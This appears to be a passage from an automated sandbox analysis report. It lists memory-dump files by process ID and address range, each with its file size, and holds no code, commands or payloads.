        • memory/2088-210-0x00000000060A0000-0x00000000060D2000-memory.dmp
          Filesize

          200KB

        • memory/2096-157-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/2096-143-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/2096-159-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/2096-156-0x0000000000460000-0x00000000010A2000-memory.dmp
          Filesize

          12.3MB

        • memory/2096-141-0x0000000000460000-0x00000000010A2000-memory.dmp
          Filesize

          12.3MB

        • memory/2096-140-0x0000000000460000-0x00000000010A2000-memory.dmp
          Filesize

          12.3MB

        • memory/2096-135-0x0000000000000000-mapping.dmp
        • memory/2096-138-0x0000000000460000-0x00000000010A2000-memory.dmp
          Filesize

          12.3MB

        • memory/2096-139-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/2984-236-0x0000000006060000-0x00000000060D6000-memory.dmp
          Filesize

          472KB

        • memory/2984-227-0x0000000006DE0000-0x000000000730C000-memory.dmp
          Filesize

          5.2MB

        • memory/2984-226-0x00000000066E0000-0x00000000068A2000-memory.dmp
          Filesize

          1.8MB

        • memory/2984-238-0x0000000006030000-0x000000000604E000-memory.dmp
          Filesize

          120KB

        • memory/2984-208-0x0000000004D20000-0x0000000004D5C000-memory.dmp
          Filesize

          240KB

        • memory/2984-223-0x0000000005C30000-0x0000000005CC2000-memory.dmp
          Filesize

          584KB

        • memory/2984-205-0x0000000004CC0000-0x0000000004CD2000-memory.dmp
          Filesize

          72KB

        • memory/2984-204-0x0000000005260000-0x0000000005878000-memory.dmp
          Filesize

          6.1MB

        • memory/2984-197-0x0000000000400000-0x000000000041C000-memory.dmp
          Filesize

          112KB

        • memory/2984-206-0x0000000004DF0000-0x0000000004EFA000-memory.dmp
          Filesize

          1.0MB

        • memory/2984-196-0x0000000000000000-mapping.dmp
        • memory/3252-154-0x0000000000720000-0x0000000001362000-memory.dmp
          Filesize

          12.3MB

        • memory/3252-233-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/3252-232-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/3252-231-0x0000000000720000-0x0000000001362000-memory.dmp
          Filesize

          12.3MB

        • memory/3252-172-0x0000000180000000-0x0000000180023000-memory.dmp
          Filesize

          140KB

        • memory/3252-170-0x0000000003E60000-0x0000000003E72000-memory.dmp
          Filesize

          72KB

        • memory/3252-155-0x0000000000720000-0x0000000001362000-memory.dmp
          Filesize

          12.3MB

        • memory/3252-221-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/3252-153-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/3252-152-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/3252-151-0x0000000000720000-0x0000000001362000-memory.dmp
          Filesize

          12.3MB

        • memory/3252-219-0x0000000000720000-0x0000000001362000-memory.dmp
          Filesize

          12.3MB

        • memory/3252-220-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/3420-194-0x0000000000000000-mapping.dmp
        • memory/3592-179-0x00007FF690A4E000-mapping.dmp
        • memory/3592-239-0x00007FF68F900000-0x00007FF690A6F000-memory.dmp
          Filesize

          17.4MB

        • memory/3592-180-0x00007FF68F900000-0x00007FF690A6F000-memory.dmp
          Filesize

          17.4MB

        • memory/3592-234-0x0000000003AB0000-0x0000000003AD0000-memory.dmp
          Filesize

          128KB

        • memory/3612-199-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/3612-191-0x0000020F1E440000-0x0000020F1E44C000-memory.dmp
          Filesize

          48KB

        • memory/3612-202-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/3612-182-0x0000000000000000-mapping.dmp
        • memory/3796-147-0x0000000000000000-mapping.dmp
        • memory/4236-133-0x0000000000000000-mapping.dmp
        • memory/4640-160-0x0000000000000000-mapping.dmp
        • memory/4640-164-0x00000000005F0000-0x000000000065C000-memory.dmp
          Filesize

          432KB

        • memory/4640-181-0x00000000083C0000-0x0000000008964000-memory.dmp
          Filesize

          5.6MB

        • memory/4784-167-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/4784-166-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/4784-158-0x0000000000000000-mapping.dmp
        • memory/5056-168-0x0000000000000000-mapping.dmp
        • memory/5056-237-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmp
          Filesize

          2.6MB

        • memory/5056-240-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp
          Filesize

          2.0MB

        • memory/5056-241-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmp
          Filesize

          2.6MB

        • memory/5056-242-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmp
          Filesize

          2.6MB

        • memory/5056-171-0x00007FF67F710000-0x00007FF67F9B0000-memory.dmp
          Filesize

          2.6MB